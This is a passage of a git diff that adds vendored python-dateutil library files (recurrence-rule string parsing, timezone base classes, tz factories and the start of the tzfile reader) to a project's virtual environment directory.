else: + tzlookup = getattr(tzids, 'get', None) + if tzlookup is None: + msg = ('tzids must be a callable, mapping, or None, ' + 'not %s' % tzids) + raise ValueError(msg) + + TZID = tzlookup(tzkey) + continue + + # RFC 5445 3.8.2.4: The VALUE parameter is optional, but may be found + # only once. + if parm not in {"VALUE=DATE-TIME", "VALUE=DATE"}: + raise ValueError("unsupported parm: " + parm) + else: + if value_found: + msg = ("Duplicate value parameter found in: " + parm) + raise ValueError(msg) + value_found = True + + for datestr in date_value.split(','): + date = parser.parse(datestr, ignoretz=ignoretz, tzinfos=tzinfos) + if TZID is not None: + if date.tzinfo is None: + date = date.replace(tzinfo=TZID) + else: + raise ValueError('DTSTART/EXDATE specifies multiple timezone') + datevals.append(date) + + return datevals + + def _parse_rfc(self, s, + dtstart=None, + cache=False, + unfold=False, + forceset=False, + compatible=False, + ignoretz=False, + tzids=None, + tzinfos=None): + global parser + if compatible: + forceset = True + unfold = True + + TZID_NAMES = dict(map( + lambda x: (x.upper(), x), + re.findall('TZID=(?P[^:]+):', s) + )) + s = s.upper() + if not s.strip(): + raise ValueError("empty string") + if unfold: + lines = s.splitlines() + i = 0 + while i < len(lines): + line = lines[i].rstrip() + if not line: + del lines[i] + elif i > 0 and line[0] == " ": + lines[i-1] += line[1:] + del lines[i] + else: + i += 1 + else: + lines = s.split() + if (not forceset and len(lines) == 1 and (s.find(':') == -1 or + s.startswith('RRULE:'))): + return self._parse_rfc_rrule(lines[0], cache=cache, + dtstart=dtstart, ignoretz=ignoretz, + tzinfos=tzinfos) + else: + rrulevals = [] + rdatevals = [] + exrulevals = [] + exdatevals = [] + for line in lines: + if not line: + continue + if line.find(':') == -1: + name = "RRULE" + value = line + else: + name, value = line.split(':', 1) + parms = name.split(';') + if not parms: + raise ValueError("empty property name") + name = parms[0] + parms = parms[1:] + if name == "RRULE": + for parm in parms: + raise ValueError("unsupported RRULE parm: "+parm) + rrulevals.append(value) + elif name == "RDATE": + for parm in parms: + if parm != "VALUE=DATE-TIME": + raise ValueError("unsupported RDATE parm: "+parm) + rdatevals.append(value) + elif name == "EXRULE": + for parm in parms: + raise ValueError("unsupported EXRULE parm: "+parm) + exrulevals.append(value) + elif name == "EXDATE": + exdatevals.extend( + self._parse_date_value(value, parms, + TZID_NAMES, ignoretz, + tzids, tzinfos) + ) + elif name == "DTSTART": + dtvals = self._parse_date_value(value, parms, TZID_NAMES, + ignoretz, tzids, tzinfos) + if len(dtvals) != 1: + raise ValueError("Multiple DTSTART values specified:" + + value) + dtstart = dtvals[0] + else: + raise ValueError("unsupported property: "+name) + if (forceset or len(rrulevals) > 1 or rdatevals + or exrulevals or exdatevals): + if not parser and (rdatevals or exdatevals): + from dateutil import parser + rset = rruleset(cache=cache) + for value in rrulevals: + rset.rrule(self._parse_rfc_rrule(value, dtstart=dtstart, + ignoretz=ignoretz, + tzinfos=tzinfos)) + for value in rdatevals: + for datestr in value.split(','): + rset.rdate(parser.parse(datestr, + ignoretz=ignoretz, + tzinfos=tzinfos)) + for value in exrulevals: + rset.exrule(self._parse_rfc_rrule(value, dtstart=dtstart, + ignoretz=ignoretz, + tzinfos=tzinfos)) + for value in exdatevals: + rset.exdate(value) + if compatible and dtstart: + rset.rdate(dtstart) + return rset + else: + return self._parse_rfc_rrule(rrulevals[0], + dtstart=dtstart, + cache=cache, + ignoretz=ignoretz, + tzinfos=tzinfos) + + def __call__(self, s, **kwargs): + return self._parse_rfc(s, **kwargs) + + +rrulestr = _rrulestr() + +# vim:ts=4:sw=4:et diff --git a/env/Lib/site-packages/dateutil/tz/__init__.py b/env/Lib/site-packages/dateutil/tz/__init__.py new file mode 100644 index 00000000..af1352c4 --- /dev/null +++ b/env/Lib/site-packages/dateutil/tz/__init__.py @@ -0,0 +1,12 @@ +# -*- coding: utf-8 -*- +from .tz import * +from .tz import __doc__ + +__all__ = ["tzutc", "tzoffset", "tzlocal", "tzfile", "tzrange", + "tzstr", "tzical", "tzwin", "tzwinlocal", "gettz", + "enfold", "datetime_ambiguous", "datetime_exists", + "resolve_imaginary", "UTC", "DeprecatedTzFormatWarning"] + + +class DeprecatedTzFormatWarning(Warning): + """Warning raised when time zones are parsed from deprecated formats.""" diff --git a/env/Lib/site-packages/dateutil/tz/_common.py b/env/Lib/site-packages/dateutil/tz/_common.py new file mode 100644 index 00000000..e6ac1183 --- /dev/null +++ b/env/Lib/site-packages/dateutil/tz/_common.py @@ -0,0 +1,419 @@ +from six import PY2 + +from functools import wraps + +from datetime import datetime, timedelta, tzinfo + + +ZERO = timedelta(0) + +__all__ = ['tzname_in_python2', 'enfold'] + + +def tzname_in_python2(namefunc): + """Change unicode output into bytestrings in Python 2 + + tzname() API changed in Python 3. It used to return bytes, but was changed + to unicode strings + """ + if PY2: + @wraps(namefunc) + def adjust_encoding(*args, **kwargs): + name = namefunc(*args, **kwargs) + if name is not None: + name = name.encode() + + return name + + return adjust_encoding + else: + return namefunc + + +# The following is adapted from Alexander Belopolsky's tz library +# https://github.com/abalkin/tz +if hasattr(datetime, 'fold'): + # This is the pre-python 3.6 fold situation + def enfold(dt, fold=1): + """ + Provides a unified interface for assigning the ``fold`` attribute to + datetimes both before and after the implementation of PEP-495. + + :param fold: + The value for the ``fold`` attribute in the returned datetime. This + should be either 0 or 1. + + :return: + Returns an object for which ``getattr(dt, 'fold', 0)`` returns + ``fold`` for all versions of Python. In versions prior to + Python 3.6, this is a ``_DatetimeWithFold`` object, which is a + subclass of :py:class:`datetime.datetime` with the ``fold`` + attribute added, if ``fold`` is 1. + + .. versionadded:: 2.6.0 + """ + return dt.replace(fold=fold) + +else: + class _DatetimeWithFold(datetime): + """ + This is a class designed to provide a PEP 495-compliant interface for + Python versions before 3.6. It is used only for dates in a fold, so + the ``fold`` attribute is fixed at ``1``. + + .. versionadded:: 2.6.0 + """ + __slots__ = () + + def replace(self, *args, **kwargs): + """ + Return a datetime with the same attributes, except for those + attributes given new values by whichever keyword arguments are + specified. Note that tzinfo=None can be specified to create a naive + datetime from an aware datetime with no conversion of date and time + data. + + This is reimplemented in ``_DatetimeWithFold`` because pypy3 will + return a ``datetime.datetime`` even if ``fold`` is unchanged. + """ + argnames = ( + 'year', 'month', 'day', 'hour', 'minute', 'second', + 'microsecond', 'tzinfo' + ) + + for arg, argname in zip(args, argnames): + if argname in kwargs: + raise TypeError('Duplicate argument: {}'.format(argname)) + + kwargs[argname] = arg + + for argname in argnames: + if argname not in kwargs: + kwargs[argname] = getattr(self, argname) + + dt_class = self.__class__ if kwargs.get('fold', 1) else datetime + + return dt_class(**kwargs) + + @property + def fold(self): + return 1 + + def enfold(dt, fold=1): + """ + Provides a unified interface for assigning the ``fold`` attribute to + datetimes both before and after the implementation of PEP-495. + + :param fold: + The value for the ``fold`` attribute in the returned datetime. This + should be either 0 or 1. + + :return: + Returns an object for which ``getattr(dt, 'fold', 0)`` returns + ``fold`` for all versions of Python. In versions prior to + Python 3.6, this is a ``_DatetimeWithFold`` object, which is a + subclass of :py:class:`datetime.datetime` with the ``fold`` + attribute added, if ``fold`` is 1. + + .. versionadded:: 2.6.0 + """ + if getattr(dt, 'fold', 0) == fold: + return dt + + args = dt.timetuple()[:6] + args += (dt.microsecond, dt.tzinfo) + + if fold: + return _DatetimeWithFold(*args) + else: + return datetime(*args) + + +def _validate_fromutc_inputs(f): + """ + The CPython version of ``fromutc`` checks that the input is a ``datetime`` + object and that ``self`` is attached as its ``tzinfo``. + """ + @wraps(f) + def fromutc(self, dt): + if not isinstance(dt, datetime): + raise TypeError("fromutc() requires a datetime argument") + if dt.tzinfo is not self: + raise ValueError("dt.tzinfo is not self") + + return f(self, dt) + + return fromutc + + +class _tzinfo(tzinfo): + """ + Base class for all ``dateutil`` ``tzinfo`` objects. + """ + + def is_ambiguous(self, dt): + """ + Whether or not the "wall time" of a given datetime is ambiguous in this + zone. + + :param dt: + A :py:class:`datetime.datetime`, naive or time zone aware. + + + :return: + Returns ``True`` if ambiguous, ``False`` otherwise. + + .. versionadded:: 2.6.0 + """ + + dt = dt.replace(tzinfo=self) + + wall_0 = enfold(dt, fold=0) + wall_1 = enfold(dt, fold=1) + + same_offset = wall_0.utcoffset() == wall_1.utcoffset() + same_dt = wall_0.replace(tzinfo=None) == wall_1.replace(tzinfo=None) + + return same_dt and not same_offset + + def _fold_status(self, dt_utc, dt_wall): + """ + Determine the fold status of a "wall" datetime, given a representation + of the same datetime as a (naive) UTC datetime. This is calculated based + on the assumption that ``dt.utcoffset() - dt.dst()`` is constant for all + datetimes, and that this offset is the actual number of hours separating + ``dt_utc`` and ``dt_wall``. + + :param dt_utc: + Representation of the datetime as UTC + + :param dt_wall: + Representation of the datetime as "wall time". This parameter must + either have a `fold` attribute or have a fold-naive + :class:`datetime.tzinfo` attached, otherwise the calculation may + fail. + """ + if self.is_ambiguous(dt_wall): + delta_wall = dt_wall - dt_utc + _fold = int(delta_wall == (dt_utc.utcoffset() - dt_utc.dst())) + else: + _fold = 0 + + return _fold + + def _fold(self, dt): + return getattr(dt, 'fold', 0) + + def _fromutc(self, dt): + """ + Given a timezone-aware datetime in a given timezone, calculates a + timezone-aware datetime in a new timezone. + + Since this is the one time that we *know* we have an unambiguous + datetime object, we take this opportunity to determine whether the + datetime is ambiguous and in a "fold" state (e.g. if it's the first + occurrence, chronologically, of the ambiguous datetime). + + :param dt: + A timezone-aware :class:`datetime.datetime` object. + """ + + # Re-implement the algorithm from Python's datetime.py + dtoff = dt.utcoffset() + if dtoff is None: + raise ValueError("fromutc() requires a non-None utcoffset() " + "result") + + # The original datetime.py code assumes that `dst()` defaults to + # zero during ambiguous times. PEP 495 inverts this presumption, so + # for pre-PEP 495 versions of python, we need to tweak the algorithm. + dtdst = dt.dst() + if dtdst is None: + raise ValueError("fromutc() requires a non-None dst() result") + delta = dtoff - dtdst + + dt += delta + # Set fold=1 so we can default to being in the fold for + # ambiguous dates. + dtdst = enfold(dt, fold=1).dst() + if dtdst is None: + raise ValueError("fromutc(): dt.dst gave inconsistent " + "results; cannot convert") + return dt + dtdst + + @_validate_fromutc_inputs + def fromutc(self, dt): + """ + Given a timezone-aware datetime in a given timezone, calculates a + timezone-aware datetime in a new timezone. + + Since this is the one time that we *know* we have an unambiguous + datetime object, we take this opportunity to determine whether the + datetime is ambiguous and in a "fold" state (e.g. if it's the first + occurrence, chronologically, of the ambiguous datetime). + + :param dt: + A timezone-aware :class:`datetime.datetime` object. + """ + dt_wall = self._fromutc(dt) + + # Calculate the fold status given the two datetimes. + _fold = self._fold_status(dt, dt_wall) + + # Set the default fold value for ambiguous dates + return enfold(dt_wall, fold=_fold) + + +class tzrangebase(_tzinfo): + """ + This is an abstract base class for time zones represented by an annual + transition into and out of DST. Child classes should implement the following + methods: + + * ``__init__(self, *args, **kwargs)`` + * ``transitions(self, year)`` - this is expected to return a tuple of + datetimes representing the DST on and off transitions in standard + time. + + A fully initialized ``tzrangebase`` subclass should also provide the + following attributes: + * ``hasdst``: Boolean whether or not the zone uses DST. + * ``_dst_offset`` / ``_std_offset``: :class:`datetime.timedelta` objects + representing the respective UTC offsets. + * ``_dst_abbr`` / ``_std_abbr``: Strings representing the timezone short + abbreviations in DST and STD, respectively. + * ``_hasdst``: Whether or not the zone has DST. + + .. versionadded:: 2.6.0 + """ + def __init__(self): + raise NotImplementedError('tzrangebase is an abstract base class') + + def utcoffset(self, dt): + isdst = self._isdst(dt) + + if isdst is None: + return None + elif isdst: + return self._dst_offset + else: + return self._std_offset + + def dst(self, dt): + isdst = self._isdst(dt) + + if isdst is None: + return None + elif isdst: + return self._dst_base_offset + else: + return ZERO + + @tzname_in_python2 + def tzname(self, dt): + if self._isdst(dt): + return self._dst_abbr + else: + return self._std_abbr + + def fromutc(self, dt): + """ Given a datetime in UTC, return local time """ + if not isinstance(dt, datetime): + raise TypeError("fromutc() requires a datetime argument") + + if dt.tzinfo is not self: + raise ValueError("dt.tzinfo is not self") + + # Get transitions - if there are none, fixed offset + transitions = self.transitions(dt.year) + if transitions is None: + return dt + self.utcoffset(dt) + + # Get the transition times in UTC + dston, dstoff = transitions + + dston -= self._std_offset + dstoff -= self._std_offset + + utc_transitions = (dston, dstoff) + dt_utc = dt.replace(tzinfo=None) + + isdst = self._naive_isdst(dt_utc, utc_transitions) + + if isdst: + dt_wall = dt + self._dst_offset + else: + dt_wall = dt + self._std_offset + + _fold = int(not isdst and self.is_ambiguous(dt_wall)) + + return enfold(dt_wall, fold=_fold) + + def is_ambiguous(self, dt): + """ + Whether or not the "wall time" of a given datetime is ambiguous in this + zone. + + :param dt: + A :py:class:`datetime.datetime`, naive or time zone aware. + + + :return: + Returns ``True`` if ambiguous, ``False`` otherwise. + + .. versionadded:: 2.6.0 + """ + if not self.hasdst: + return False + + start, end = self.transitions(dt.year) + + dt = dt.replace(tzinfo=None) + return (end <= dt < end + self._dst_base_offset) + + def _isdst(self, dt): + if not self.hasdst: + return False + elif dt is None: + return None + + transitions = self.transitions(dt.year) + + if transitions is None: + return False + + dt = dt.replace(tzinfo=None) + + isdst = self._naive_isdst(dt, transitions) + + # Handle ambiguous dates + if not isdst and self.is_ambiguous(dt): + return not self._fold(dt) + else: + return isdst + + def _naive_isdst(self, dt, transitions): + dston, dstoff = transitions + + dt = dt.replace(tzinfo=None) + + if dston < dstoff: + isdst = dston <= dt < dstoff + else: + isdst = not dstoff <= dt < dston + + return isdst + + @property + def _dst_base_offset(self): + return self._dst_offset - self._std_offset + + __hash__ = None + + def __ne__(self, other): + return not (self == other) + + def __repr__(self): + return "%s(...)" % self.__class__.__name__ + + __reduce__ = object.__reduce__ diff --git a/env/Lib/site-packages/dateutil/tz/_factories.py b/env/Lib/site-packages/dateutil/tz/_factories.py new file mode 100644 index 00000000..f8a65891 --- /dev/null +++ b/env/Lib/site-packages/dateutil/tz/_factories.py @@ -0,0 +1,80 @@ +from datetime import timedelta +import weakref +from collections import OrderedDict + +from six.moves import _thread + + +class _TzSingleton(type): + def __init__(cls, *args, **kwargs): + cls.__instance = None + super(_TzSingleton, cls).__init__(*args, **kwargs) + + def __call__(cls): + if cls.__instance is None: + cls.__instance = super(_TzSingleton, cls).__call__() + return cls.__instance + + +class _TzFactory(type): + def instance(cls, *args, **kwargs): + """Alternate constructor that returns a fresh instance""" + return type.__call__(cls, *args, **kwargs) + + +class _TzOffsetFactory(_TzFactory): + def __init__(cls, *args, **kwargs): + cls.__instances = weakref.WeakValueDictionary() + cls.__strong_cache = OrderedDict() + cls.__strong_cache_size = 8 + + cls._cache_lock = _thread.allocate_lock() + + def __call__(cls, name, offset): + if isinstance(offset, timedelta): + key = (name, offset.total_seconds()) + else: + key = (name, offset) + + instance = cls.__instances.get(key, None) + if instance is None: + instance = cls.__instances.setdefault(key, + cls.instance(name, offset)) + + # This lock may not be necessary in Python 3. See GH issue #901 + with cls._cache_lock: + cls.__strong_cache[key] = cls.__strong_cache.pop(key, instance) + + # Remove an item if the strong cache is overpopulated + if len(cls.__strong_cache) > cls.__strong_cache_size: + cls.__strong_cache.popitem(last=False) + + return instance + + +class _TzStrFactory(_TzFactory): + def __init__(cls, *args, **kwargs): + cls.__instances = weakref.WeakValueDictionary() + cls.__strong_cache = OrderedDict() + cls.__strong_cache_size = 8 + + cls.__cache_lock = _thread.allocate_lock() + + def __call__(cls, s, posix_offset=False): + key = (s, posix_offset) + instance = cls.__instances.get(key, None) + + if instance is None: + instance = cls.__instances.setdefault(key, + cls.instance(s, posix_offset)) + + # This lock may not be necessary in Python 3. See GH issue #901 + with cls.__cache_lock: + cls.__strong_cache[key] = cls.__strong_cache.pop(key, instance) + + # Remove an item if the strong cache is overpopulated + if len(cls.__strong_cache) > cls.__strong_cache_size: + cls.__strong_cache.popitem(last=False) + + return instance + diff --git a/env/Lib/site-packages/dateutil/tz/tz.py b/env/Lib/site-packages/dateutil/tz/tz.py new file mode 100644 index 00000000..c67f56d4 --- /dev/null +++ b/env/Lib/site-packages/dateutil/tz/tz.py @@ -0,0 +1,1849 @@ +# -*- coding: utf-8 -*- +""" +This module offers timezone implementations subclassing the abstract +:py:class:`datetime.tzinfo` type. There are classes to handle tzfile format +files (usually are in :file:`/etc/localtime`, :file:`/usr/share/zoneinfo`, +etc), TZ environment string (in all known formats), given ranges (with help +from relative deltas), local machine timezone, fixed offset timezone, and UTC +timezone. +""" +import datetime +import struct +import time +import sys +import os +import bisect +import weakref +from collections import OrderedDict + +import six +from six import string_types +from six.moves import _thread +from ._common import tzname_in_python2, _tzinfo +from ._common import tzrangebase, enfold +from ._common import _validate_fromutc_inputs + +from ._factories import _TzSingleton, _TzOffsetFactory +from ._factories import _TzStrFactory +try: + from .win import tzwin, tzwinlocal +except ImportError: + tzwin = tzwinlocal = None + +# For warning about rounding tzinfo +from warnings import warn + +ZERO = datetime.timedelta(0) +EPOCH = datetime.datetime.utcfromtimestamp(0) +EPOCHORDINAL = EPOCH.toordinal() + + +@six.add_metaclass(_TzSingleton) +class tzutc(datetime.tzinfo): + """ + This is a tzinfo object that represents the UTC time zone. + + **Examples:** + + .. doctest:: + + >>> from datetime import * + >>> from dateutil.tz import * + + >>> datetime.now() + datetime.datetime(2003, 9, 27, 9, 40, 1, 521290) + + >>> datetime.now(tzutc()) + datetime.datetime(2003, 9, 27, 12, 40, 12, 156379, tzinfo=tzutc()) + + >>> datetime.now(tzutc()).tzname() + 'UTC' + + .. versionchanged:: 2.7.0 + ``tzutc()`` is now a singleton, so the result of ``tzutc()`` will + always return the same object. + + .. doctest:: + + >>> from dateutil.tz import tzutc, UTC + >>> tzutc() is tzutc() + True + >>> tzutc() is UTC + True + """ + def utcoffset(self, dt): + return ZERO + + def dst(self, dt): + return ZERO + + @tzname_in_python2 + def tzname(self, dt): + return "UTC" + + def is_ambiguous(self, dt): + """ + Whether or not the "wall time" of a given datetime is ambiguous in this + zone. + + :param dt: + A :py:class:`datetime.datetime`, naive or time zone aware. + + + :return: + Returns ``True`` if ambiguous, ``False`` otherwise. + + .. versionadded:: 2.6.0 + """ + return False + + @_validate_fromutc_inputs + def fromutc(self, dt): + """ + Fast track version of fromutc() returns the original ``dt`` object for + any valid :py:class:`datetime.datetime` object. + """ + return dt + + def __eq__(self, other): + if not isinstance(other, (tzutc, tzoffset)): + return NotImplemented + + return (isinstance(other, tzutc) or + (isinstance(other, tzoffset) and other._offset == ZERO)) + + __hash__ = None + + def __ne__(self, other): + return not (self == other) + + def __repr__(self): + return "%s()" % self.__class__.__name__ + + __reduce__ = object.__reduce__ + + +#: Convenience constant providing a :class:`tzutc()` instance +#: +#: .. versionadded:: 2.7.0 +UTC = tzutc() + + +@six.add_metaclass(_TzOffsetFactory) +class tzoffset(datetime.tzinfo): + """ + A simple class for representing a fixed offset from UTC. + + :param name: + The timezone name, to be returned when ``tzname()`` is called. + :param offset: + The time zone offset in seconds, or (since version 2.6.0, represented + as a :py:class:`datetime.timedelta` object). + """ + def __init__(self, name, offset): + self._name = name + + try: + # Allow a timedelta + offset = offset.total_seconds() + except (TypeError, AttributeError): + pass + + self._offset = datetime.timedelta(seconds=_get_supported_offset(offset)) + + def utcoffset(self, dt): + return self._offset + + def dst(self, dt): + return ZERO + + @tzname_in_python2 + def tzname(self, dt): + return self._name + + @_validate_fromutc_inputs + def fromutc(self, dt): + return dt + self._offset + + def is_ambiguous(self, dt): + """ + Whether or not the "wall time" of a given datetime is ambiguous in this + zone. + + :param dt: + A :py:class:`datetime.datetime`, naive or time zone aware. + :return: + Returns ``True`` if ambiguous, ``False`` otherwise. + + .. versionadded:: 2.6.0 + """ + return False + + def __eq__(self, other): + if not isinstance(other, tzoffset): + return NotImplemented + + return self._offset == other._offset + + __hash__ = None + + def __ne__(self, other): + return not (self == other) + + def __repr__(self): + return "%s(%s, %s)" % (self.__class__.__name__, + repr(self._name), + int(self._offset.total_seconds())) + + __reduce__ = object.__reduce__ + + +class tzlocal(_tzinfo): + """ + A :class:`tzinfo` subclass built around the ``time`` timezone functions. + """ + def __init__(self): + super(tzlocal, self).__init__() + + self._std_offset = datetime.timedelta(seconds=-time.timezone) + if time.daylight: + self._dst_offset = datetime.timedelta(seconds=-time.altzone) + else: + self._dst_offset = self._std_offset + + self._dst_saved = self._dst_offset - self._std_offset + self._hasdst = bool(self._dst_saved) + self._tznames = tuple(time.tzname) + + def utcoffset(self, dt): + if dt is None and self._hasdst: + return None + + if self._isdst(dt): + return self._dst_offset + else: + return self._std_offset + + def dst(self, dt): + if dt is None and self._hasdst: + return None + + if self._isdst(dt): + return self._dst_offset - self._std_offset + else: + return ZERO + + @tzname_in_python2 + def tzname(self, dt): + return self._tznames[self._isdst(dt)] + + def is_ambiguous(self, dt): + """ + Whether or not the "wall time" of a given datetime is ambiguous in this + zone. + + :param dt: + A :py:class:`datetime.datetime`, naive or time zone aware. + + + :return: + Returns ``True`` if ambiguous, ``False`` otherwise. + + .. versionadded:: 2.6.0 + """ + naive_dst = self._naive_is_dst(dt) + return (not naive_dst and + (naive_dst != self._naive_is_dst(dt - self._dst_saved))) + + def _naive_is_dst(self, dt): + timestamp = _datetime_to_timestamp(dt) + return time.localtime(timestamp + time.timezone).tm_isdst + + def _isdst(self, dt, fold_naive=True): + # We can't use mktime here. It is unstable when deciding if + # the hour near to a change is DST or not. + # + # timestamp = time.mktime((dt.year, dt.month, dt.day, dt.hour, + # dt.minute, dt.second, dt.weekday(), 0, -1)) + # return time.localtime(timestamp).tm_isdst + # + # The code above yields the following result: + # + # >>> import tz, datetime + # >>> t = tz.tzlocal() + # >>> datetime.datetime(2003,2,15,23,tzinfo=t).tzname() + # 'BRDT' + # >>> datetime.datetime(2003,2,16,0,tzinfo=t).tzname() + # 'BRST' + # >>> datetime.datetime(2003,2,15,23,tzinfo=t).tzname() + # 'BRST' + # >>> datetime.datetime(2003,2,15,22,tzinfo=t).tzname() + # 'BRDT' + # >>> datetime.datetime(2003,2,15,23,tzinfo=t).tzname() + # 'BRDT' + # + # Here is a more stable implementation: + # + if not self._hasdst: + return False + + # Check for ambiguous times: + dstval = self._naive_is_dst(dt) + fold = getattr(dt, 'fold', None) + + if self.is_ambiguous(dt): + if fold is not None: + return not self._fold(dt) + else: + return True + + return dstval + + def __eq__(self, other): + if isinstance(other, tzlocal): + return (self._std_offset == other._std_offset and + self._dst_offset == other._dst_offset) + elif isinstance(other, tzutc): + return (not self._hasdst and + self._tznames[0] in {'UTC', 'GMT'} and + self._std_offset == ZERO) + elif isinstance(other, tzoffset): + return (not self._hasdst and + self._tznames[0] == other._name and + self._std_offset == other._offset) + else: + return NotImplemented + + __hash__ = None + + def __ne__(self, other): + return not (self == other) + + def __repr__(self): + return "%s()" % self.__class__.__name__ + + __reduce__ = object.__reduce__ + + +class _ttinfo(object): + __slots__ = ["offset", "delta", "isdst", "abbr", + "isstd", "isgmt", "dstoffset"] + + def __init__(self): + for attr in self.__slots__: + setattr(self, attr, None) + + def __repr__(self): + l = [] + for attr in self.__slots__: + value = getattr(self, attr) + if value is not None: + l.append("%s=%s" % (attr, repr(value))) + return "%s(%s)" % (self.__class__.__name__, ", ".join(l)) + + def __eq__(self, other): + if not isinstance(other, _ttinfo): + return NotImplemented + + return (self.offset == other.offset and + self.delta == other.delta and + self.isdst == other.isdst and + self.abbr == other.abbr and + self.isstd == other.isstd and + self.isgmt == other.isgmt and + self.dstoffset == other.dstoffset) + + __hash__ = None + + def __ne__(self, other): + return not (self == other) + + def __getstate__(self): + state = {} + for name in self.__slots__: + state[name] = getattr(self, name, None) + return state + + def __setstate__(self, state): + for name in self.__slots__: + if name in state: + setattr(self, name, state[name]) + + +class _tzfile(object): + """ + Lightweight class for holding the relevant transition and time zone + information read from binary tzfiles. + """ + attrs = ['trans_list', 'trans_list_utc', 'trans_idx', 'ttinfo_list', + 'ttinfo_std', 'ttinfo_dst', 'ttinfo_before', 'ttinfo_first'] + + def __init__(self, **kwargs): + for attr in self.attrs: + setattr(self, attr, kwargs.get(attr, None)) + + +class tzfile(_tzinfo): + """ + This is a ``tzinfo`` subclass that allows one to use the ``tzfile(5)`` + format timezone files to extract current and historical zone information. + + :param fileobj: + This can be an opened file stream or a file name that the time zone + information can be read from. + + :param filename: + This is an optional parameter specifying the source of the time zone + information in the event that ``fileobj`` is a file object. If omitted + and ``fileobj`` is a file stream, this parameter will be set either to + ``fileobj``'s ``name`` attribute or to ``repr(fileobj)``. + + See `Sources for Time Zone and Daylight Saving Time Data + `_ for more information. + Time zone files can be compiled from the `IANA Time Zone database files + `_ with the `zic time zone compiler + `_ + + .. note:: + + Only construct a ``tzfile`` directly if you have a specific timezone + file on disk that you want to read into a Python ``tzinfo`` object. + If you want to get a ``tzfile`` representing a specific IANA zone, + (e.g. ``'America/New_York'``), you should call + :func:`dateutil.tz.gettz` with the zone identifier. + + + **Examples:** + + Using the US Eastern time zone as an example, we can see that a ``tzfile`` + provides time zone information for the standard Daylight Saving offsets: + + .. testsetup:: tzfile + + from dateutil.tz import gettz + from datetime import datetime + + .. doctest:: tzfile + + >>> NYC = gettz('America/New_York') + >>> NYC + tzfile('/usr/share/zoneinfo/America/New_York') + + >>> print(datetime(2016, 1, 3, tzinfo=NYC)) # EST + 2016-01-03 00:00:00-05:00 + + >>> print(datetime(2016, 7, 7, tzinfo=NYC)) # EDT + 2016-07-07 00:00:00-04:00 + + + The ``tzfile`` structure contains a fully history of the time zone, + so historical dates will also have the right offsets. For example, before + the adoption of the UTC standards, New York used local solar mean time: + + .. doctest:: tzfile + + >>> print(datetime(1901, 4, 12, tzinfo=NYC)) # LMT + 1901-04-12 00:00:00-04:56 + + And during World War II, New York was on "Eastern War Time", which was a + state of permanent daylight saving time: + + .. doctest:: tzfile + + >>> print(datetime(1944, 2, 7, tzinfo=NYC)) # EWT + 1944-02-07 00:00:00-04:00 + + """ + + def __init__(self, fileobj, filename=None): + super(tzfile, self).__init__() + + file_opened_here = False + if isinstance(fileobj, string_types): + self._filename = fileobj + fileobj = open(fileobj, 'rb') + file_opened_here = True + elif filename is not None: + self._filename = filename + elif hasattr(fileobj, "name"): + self._filename = fileobj.name + else: + self._filename = repr(fileobj) + + if fileobj is not None: + if not file_opened_here: + fileobj = _nullcontext(fileobj) + + with fileobj as file_stream: + tzobj = self._read_tzfile(file_stream) + + self._set_tzdata(tzobj) + + def _set_tzdata(self, tzobj): + """ Set the time zone data of this object from a _tzfile object """ + # Copy the relevant attributes over as private attributes + for attr in _tzfile.attrs: + setattr(self, '_' + attr, getattr(tzobj, attr)) + + def _read_tzfile(self, fileobj): + out = _tzfile() + + # From tzfile(5): + # + # The time zone information files used by tzset(3) + # begin with the magic characters "TZif" to identify + # them as time zone information files, followed by + # sixteen bytes reserved for future use, followed by + # six four-byte values of type long, written in a + # ``standard'' byte order (the high-order byte + # of the value is written first). + if fileobj.read(4).decode() != "TZif": + raise ValueError("magic not found") + + fileobj.read(16) + + ( + # The number of UTC/local indicators stored in the file. + ttisgmtcnt, + + # The number of standard/wall indicators stored in the file. + ttisstdcnt, + + # The number of leap seconds for which data is + # stored in the file. + leapcnt, + + # The number of "transition times" for which data + # is stored in the file. + timecnt, + + # The number of "local time types" for which data + # is stored in the file (must not be zero). + typecnt, + + # The number of characters of "time zone + # abbreviation strings" stored in the file. + charcnt, + + ) = struct.unpack(">6l", fileobj.read(24)) + + # The above header is followed by tzh_timecnt four-byte + # values of type long, sorted in ascending order. + # These values are written in ``standard'' byte order. + # Each is used as a transition time (as returned by + # time(2)) at which the rules for computing local time + # change. + + if timecnt: + out.trans_list_utc = list(struct.unpack(">%dl" % timecnt, + fileobj.read(timecnt*4))) + else: + out.trans_list_utc = [] + + # Next come tzh_timecnt one-byte values of type unsigned + # char; each one tells which of the different types of + # ``local time'' types described in the file is associated + # with the same-indexed transition time. These values + # serve as indices into an array of ttinfo structures that + # appears next in the file. + + if timecnt: + out.trans_idx = struct.unpack(">%dB" % timecnt, + fileobj.read(timecnt)) + else: + out.trans_idx = [] + + # Each ttinfo structure is written as a four-byte value + # for tt_gmtoff of type long, in a standard byte + # order, followed by a one-byte value for tt_isdst + # and a one-byte value for tt_abbrind. In each + # structure, tt_gmtoff gives the number of + # seconds to be added to UTC, tt_isdst tells whether + # tm_isdst should be set by localtime(3), and + # tt_abbrind serves as an index into the array of + # time zone abbreviation characters that follow the + # ttinfo structure(s) in the file. + + ttinfo = [] + + for i in range(typecnt): + ttinfo.append(struct.unpack(">lbb", fileobj.read(6))) + + abbr = fileobj.read(charcnt).decode() + + # Then there are tzh_leapcnt pairs of four-byte + # values, written in standard byte order; the + # first value of each pair gives the time (as + # returned by time(2)) at which a leap second + # occurs; the second gives the total number of + # leap seconds to be applied after the given time. + # The pairs of values are sorted in ascending order + # by time. + + # Not used, for now (but seek for correct file position) + if leapcnt: + fileobj.seek(leapcnt * 8, os.SEEK_CUR) + + # Then there are tzh_ttisstdcnt standard/wall + # indicators, each stored as a one-byte value; + # they tell whether the transition times associated + # with local time types were specified as standard + # time or wall clock time, and are used when + # a time zone file is used in handling POSIX-style + # time zone environment variables. + + if ttisstdcnt: + isstd = struct.unpack(">%db" % ttisstdcnt, + fileobj.read(ttisstdcnt)) + + # Finally, there are tzh_ttisgmtcnt UTC/local + # indicators, each stored as a one-byte value; + # they tell whether the transition times associated + # with local time types were specified as UTC or + # local time, and are used when a time zone file + # is used in handling POSIX-style time zone envi- + # ronment variables. + + if ttisgmtcnt: + isgmt = struct.unpack(">%db" % ttisgmtcnt, + fileobj.read(ttisgmtcnt)) + + # Build ttinfo list + out.ttinfo_list = [] + for i in range(typecnt): + gmtoff, isdst, abbrind = ttinfo[i] + gmtoff = _get_supported_offset(gmtoff) + tti = _ttinfo() + tti.offset = gmtoff + tti.dstoffset = datetime.timedelta(0) + tti.delta = 